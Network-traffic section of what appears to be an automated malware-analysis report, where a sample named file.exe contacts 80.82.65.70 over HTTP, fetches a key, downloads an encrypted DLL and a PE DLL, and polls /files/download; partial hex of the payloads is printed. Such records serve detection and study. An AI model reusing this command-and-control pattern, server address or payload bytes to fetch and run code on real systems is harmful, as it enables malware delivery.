                                        Dec 12, 2024 23:09:07.815733910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.815778971 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.815849066 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.815881014 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.816598892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.816711903 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.816747904 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.817452908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.817491055 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.817528009 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.818324089 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.818357944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.818424940 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.818456888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.819153070 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.819294930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.819351912 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.820019007 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.820045948 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.820079088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.820214987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.842557907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.842639923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.842648983 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.842686892 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.843058109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.843076944 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.843102932 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.843115091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.843806982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.843975067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.844012976 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.844708920 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.844752073 CET4974480192.168.2.480.82.65.70
                                        • 80.82.65.70
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.44973680.82.65.70807020C:\Users\user\Desktop\file.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 12, 2024 23:08:30.600440025 CET412OUTGET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 1
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:32.034440041 CET204INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:31 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:32.048204899 CET386OUTGET /dll/key HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 1
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:32.544460058 CET224INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:32 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 21
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 39 74 4b 69 4b 33 62 73 59 6d 34 66 4d 75 4b 34 37 50 6b 33 73
                                        Data Ascii: 9tKiK3bsYm4fMuK47Pk3s
                                        Dec 12, 2024 23:08:32.641680956 CET391OUTGET /dll/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: 1
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:33.198153019 CET1236INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:32 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                        Content-Length: 97296
                                        Keep-Alive: timeout=5, max=98
                                        Connection: Keep-Alive
                                        Content-Type: application/octet-stream
                                        Data Raw: 58 4d 20 a9 34 49 68 99 fe 5d 0a b3 eb 74 b6 26 d0 73 db 11 cf 76 c9 30 7b 06 76 1e 76 73 27 c0 ad eb 3a aa 6c ec 68 b4 13 95 65 19 c0 04 a4 9f 52 d6 da b1 8e f9 31 83 b8 06 72 fc 52 2b 46 6b 2a f7 94 87 96 7e f9 73 f3 a2 8e 06 fa 0b c3 51 a1 b1 0b 1e e4 72 c9 54 ac 62 d5 ed 06 c7 96 dd b1 7e 63 b2 8d 5b 1d 87 0b cf 81 a3 a5 ba ba 3b a3 fc ff 6a ac 40 e8 30 b2 25 84 88 f9 dd 19 78 dd e8 c7 76 cb 77 fb f0 2e a7 1d 3c 72 75 0a 1c 17 d3 59 72 65 3b f4 62 36 1d 14 b2 48 51 2d d4 ec ba cd 38 bf 42 b3 9b 51 82 61 a1 c0 c6 52 bc 3a cc 68 26 72 90 a0 a6 17 be fc 07 3d a2 3b 72 1e 6b e2 0b 54 e2 40 e0 ea b9 d0 e1 6c 8b cf 3b 23 fd 94 33 21 e6 4f b4 00 78 da 7d a1 13 e8 b9 03 f4 00 bb ce 79 27 3c 0a 47 66 51 90 4b af 23 d8 4c 35 76 10 1e 5d d4 b3 01 f6 db 8a 1e 18 de 64 f3 a6 e9 b9 b8 cb fe 4e 7b 65 a0 c7 bc 40 05 fa f3 1e a1 c2 e7 7f 08 cd ec 7f e9 a4 1b b2 f5 41 5c 8e 11 3c bc 74 f3 75 ed 58 15 4f ef 6e c5 e9 5a 89 8e 20 86 58 62 b1 4f 3c 84 2a 5a a5 a4 cf 68 7e 9b 28 b1 57 99 66 af 7a 0d 56 cb 34 09 db 4c [TRUNCATED]
                                        Data Ascii: XM 4Ih]t&sv0{vvs':lheR1rR+Fk*~sQrTb~c[;j@0%xvw.<ruYre;b6HQ-8BQaR:h&r=;rkT@l;#3!Ox}y'<GfQK#L5v]dN{e@A\<tuXOnZ XbO<*Zh~(WfzV4L%50H`syB(IL5s:aS}XM9Jo)'M;n6]Wn)L_e>[RA.'6N.g6IY%h 3r^\b~y/h2ZLku}V<fbD<!_2zoIEP*OuPw#6N&lR}GILYNyzjHy'_5Pd9y+6q*)GcL#5\M5U])U(~HmYG1r4BhP]iM%)q.]~|jbK!N7R}T2bsq1L^!|qD'sLnD@bn%0=bQ1+lQXO|NC.d{08F<Wy{oj3n4eS] KoBH~sh1m86{lsRq~w_;X*#U
                                        Dec 12, 2024 23:08:33.198194027 CET1236INData Raw: 98 ce 36 6e 99 4f 44 62 54 a0 2b 5a 63 96 17 1c 8e 71 d6 10 c5 90 ce 53 f1 24 2d 53 60 59 54 cc 01 e7 c4 70 93 60 32 41 18 ce 0d 55 c7 24 07 69 64 06 3a b3 b0 e0 76 6e 84 3b d8 aa e7 9e f0 d5 ee 45 9c b1 50 a7 0a df 3f 11 c8 6e 7d 41 c9 76 d2 0f
                                        Data Ascii: 6nODbT+ZcqS$-S`YTp`2AU$id:vn;EP?n}AvLwU|}"Gi9ZIxw.sY-KnP2oWci#2kgDZ6~,o9"opx(uccgv@M)nL
                                        Dec 12, 2024 23:08:33.198210955 CET1236INData Raw: 44 70 21 ac fa dd 10 12 6c 8f df 8d 2a 52 37 0a bc 2b 32 e0 ca d2 85 4a 5e 2a bb 89 27 6f b7 ed ec 11 16 da 35 88 e8 c7 a0 fb 57 12 bc ee 7b 8e 20 56 98 d0 5f d5 fa 6e b8 a6 bb 07 ab 54 57 ec 21 3a 2e 06 6d 3f c9 25 6c 63 ce e7 5a 5e c2 32 24 bd
                                        Data Ascii: Dp!l*R7+2J^*'o5W{ V_nTW!:.m?%lcZ^2$2[#LeCe+: *rUz(-dFI?[*VH0-!{</Bge!ygJZ=XwPMeh5]Bki'\L4u
                                        Dec 12, 2024 23:08:33.198432922 CET1236INData Raw: 42 47 80 86 ae 70 77 dd c9 a4 43 ea 79 cc 36 24 d5 a0 a8 68 e2 19 03 24 ed 93 0c db 15 78 2a 88 5a 7c 59 51 fe c6 7c 01 35 8f e1 23 99 84 04 00 e3 d2 e6 6e e4 8f 85 26 21 77 40 81 44 b6 9f 1d 75 1d 8d 68 73 3a 7c 42 46 c1 18 9b 47 fd 90 63 33 b4
                                        Data Ascii: BGpwCy6$h$x*Z|YQ|5#n&!w@Duhs:|BFGc3_^M*H_FJn-U,e?lzR3Ib=nuH_x}q^6vP2'\:)j!gJH:yA".E<tj)>N]
                                        Dec 12, 2024 23:08:33.198457003 CET1236INData Raw: 65 3b 47 31 40 6c 58 a4 f2 72 e0 62 45 fe 13 75 f3 bf 71 98 82 ed 0b 91 d9 fa 6f fb bb 0c b6 96 17 6c 50 87 9d 6a f0 e3 e5 e5 17 2f 04 e1 78 4b 7b ec a4 0a 66 3a c7 1b de e3 06 f4 33 94 a4 66 e3 66 11 87 2a 50 e7 5f f0 a7 8b 90 b0 e7 20 a1 56 ea
                                        Data Ascii: e;G1@lXrbEuqolPj/xK{f:3ff*P_ VufJJh2~Uz=;6DmjDX,t3{etiOaB?hcMT#iHyKg7`Cx6'JgYOL(>@2O0inol%t-9'
                                        Dec 12, 2024 23:08:33.198472977 CET1236INData Raw: 18 fc a2 90 2b 67 71 38 68 4e e5 23 79 cf 33 c9 7b 68 89 24 07 d9 65 9b c2 05 5b 73 79 a0 fa 5d 0b 18 e7 03 da 3c 02 9a eb 59 06 94 8c a5 f8 69 3f f6 01 62 ec cb f9 de 45 fa 09 83 a3 f7 21 af d3 6f d5 a4 26 c7 c1 ee 10 d1 cd 23 d9 b7 3d bf ce a7
                                        Data Ascii: +gq8hN#y3{h$e[sy]<Yi?bE!o&#=fmCALA-0BiwXV-+[X>Og{:i{It_v50#xa=cWBd/QFI6N' 3F$R/3Oqt]uqp3GU@(
                                        Dec 12, 2024 23:08:33.198491096 CET1236INData Raw: 86 d0 0e 0e f5 2b 0b f5 8d f7 79 40 71 81 e1 45 02 36 97 09 61 9b 5f dc b2 b1 d0 95 a0 5d 70 7b 40 b1 c5 76 fa 38 88 2f 7c 5a a9 00 9d 47 93 df 14 da 54 c6 55 b5 fc 8e fd 29 bf 7f d9 f7 52 82 c1 5f b3 a1 7d bb 48 e0 29 38 0d 63 13 83 b6 e2 b0 e0
                                        Data Ascii: +y@qE6a_]p{@v8/|ZGTU)R_}H)8c'ATd10?lg;&jg8KnWwD0a_r+42}20.u~Q$z2i@=sdkO8m(pC
                                        Dec 12, 2024 23:08:33.198749065 CET1236INData Raw: c3 9c 69 5d eb 54 db 81 bb 6b 66 5e ab f4 9b 3d ee ff 1b d1 4b 71 18 e1 6e 42 a8 ab 9c 98 14 85 99 99 0e a1 66 a6 1c 27 bd 4a b3 a3 d4 cf 6b 2b dc 89 26 b7 59 fe 26 0d 72 54 62 f2 c9 80 5f 45 0d 82 64 28 85 e9 69 0d 69 77 dd df e1 4d 16 de d3 9a
                                        Data Ascii: i]Tkf^=KqnBf'Jk+&Y&rTb_Ed(iiwM3mo.m4moNm09k-:zTzxGc|Ub<|Y>. Tu#f-UM!+g@!4<fG7IkEl
                                        Dec 12, 2024 23:08:33.206496954 CET1236INData Raw: bf 33 41 12 5b 52 91 a7 94 e0 e5 21 5d 8d 93 1b 30 af be 5e 8f 7b 94 24 bc 87 3d 50 74 38 00 cd a5 7b 35 ab 90 44 11 e5 40 7a 29 92 1d b3 4a 52 10 d4 8d 43 b3 ff 3c 6b 20 35 4a e1 86 bc f7 99 68 67 d7 c4 fb c8 a1 b9 38 b1 27 61 b3 3c e2 f9 cc 06
                                        Data Ascii: 3A[R!]0^{$=Pt8{5D@z)JRC<k 5Jhg8'a<dIC2ui$wtHLnc}QJ4;[r|^%<t5S[AIa+48*xs30SxNZCPH3U"~6GxeZE3 SZF&=Qt`d^u
                                        Dec 12, 2024 23:08:33.206646919 CET556INData Raw: c8 a2 6d 52 66 a8 66 51 d1 c3 c9 87 9b d8 0b 44 57 eb 08 d8 cd bc b7 be b7 f1 4b 89 c0 b1 44 55 84 bc 8d 8d 36 2c c3 07 89 a5 46 50 8a ac fe f3 ba 23 4d 4f e4 0f 27 9f e1 11 07 f4 e0 e7 17 61 0e 07 54 3f cc 3f ae 3a 77 4d e4 44 61 15 b1 b3 97 25
                                        Data Ascii: mRffQDWKDU6,FP#MO'aT??:wMDa%k;3?Bc| yp`yzlSniVN(Bv}:XsOf.~zToX8n K$:D6Z%NNng=t+L~6DtFX[a/[
                                        Dec 12, 2024 23:08:33.212742090 CET1236INData Raw: c4 2b ef bd 7d 2c 43 08 ed 7b 6b 29 6e 0e 1f c4 b7 82 38 dd 6c d9 86 f4 10 35 b0 a5 85 fc 11 b1 d2 2f 8d 77 64 e2 a9 08 d7 d5 3c d2 4a 6a 78 59 69 0f 6c e4 a9 b3 24 c6 f4 58 9a 23 39 7d c7 13 4c f7 63 fc 1e b2 57 02 df 46 1e fd 6d 66 5c 34 7b 69
                                        Data Ascii: +},C{k)n8l5/wd<JjxYil$X#9}LcWFmf\4{iEd"Fl@=l5scroIjyjGEQAQ.b3zH;7[R?b&=Z}BH(-uKDnVc]F?`(&z=eSO'gu)
                                        Dec 12, 2024 23:08:33.889425993 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:34.377490997 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:34 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=97
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:36.406088114 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:36.889275074 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:36 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=96
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:38.906124115 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:39.393654108 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:39 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=95
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:41.422441959 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:41.907651901 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:41 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=94
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:44.088036060 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:44.574139118 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:44 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=93
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:46.593786955 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:47.087066889 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:46 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=92
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:49.108146906 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:49.593318939 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:49 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=91
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:51.623811007 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:52.125850916 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:51 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=90
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:54.155693054 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:54.648149967 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:54 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=89
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:56.672337055 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:57.158531904 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:56 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=88
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0
                                        Dec 12, 2024 23:08:59.186223984 CET393OUTGET /files/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: C
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:08:59.674966097 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:08:59 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Length: 1
                                        Keep-Alive: timeout=5, max=87
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 30
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.44974480.82.65.70807020C:\Users\user\Desktop\file.exe
                                        TimestampBytes transferredDirectionData
                                        Dec 12, 2024 23:09:02.840718031 CET392OUTGET /soft/download HTTP/1.1
                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                        User-Agent: d
                                        Host: 80.82.65.70
                                        Connection: Keep-Alive
                                        Cache-Control: no-cache
                                        Dec 12, 2024 23:09:04.324552059 CET1236INHTTP/1.1 200 OK
                                        Date: Thu, 12 Dec 2024 22:09:03 GMT
                                        Server: Apache/2.4.58 (Ubuntu)
                                        Content-Disposition: attachment; filename="dll";
                                        Content-Length: 242176
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/octet-stream
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                        Dec 12, 2024 23:09:04.324577093 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                        Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                        Dec 12, 2024 23:09:04.324600935 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                        Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                        Dec 12, 2024 23:09:04.324610949 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
